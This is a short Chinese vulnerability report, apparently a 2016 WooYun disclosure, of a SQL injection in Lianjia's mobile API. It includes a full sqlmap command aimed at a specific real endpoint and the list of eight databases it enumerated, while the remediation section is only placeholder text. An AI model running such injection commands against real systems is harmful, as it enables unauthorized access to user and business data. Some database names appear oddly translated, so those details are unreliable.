链家网另一处SQL注入漏洞(主站数据库)

漏洞标题 链家网另一处SQL注入漏洞(主站数据库) 相关厂商 链家网 漏洞作者 猪猪侠 提交时间 2016-04-25 11:03 公开时间 2016-06-10 21:00 漏洞类型 SQL注射漏洞…

Failure when receiving data from the peer Python sqlmap.py -u'http://m.api.lianjia.com/web/ershoufang/sidebarchengjiao?callback=jQuery111104495485157240182_1460843660050&cityId=120000&id=120000&type=city&_=1460843660051'-dbs 可用数据库[8]: [*]`session` [*]百川 [*] hdic [*] information_schema [*]连家 [*] salesmgmt [*]测试 [*] usermgr 修理计划: 补充补充 版权声明:转载请注明出处猪猪人@乌云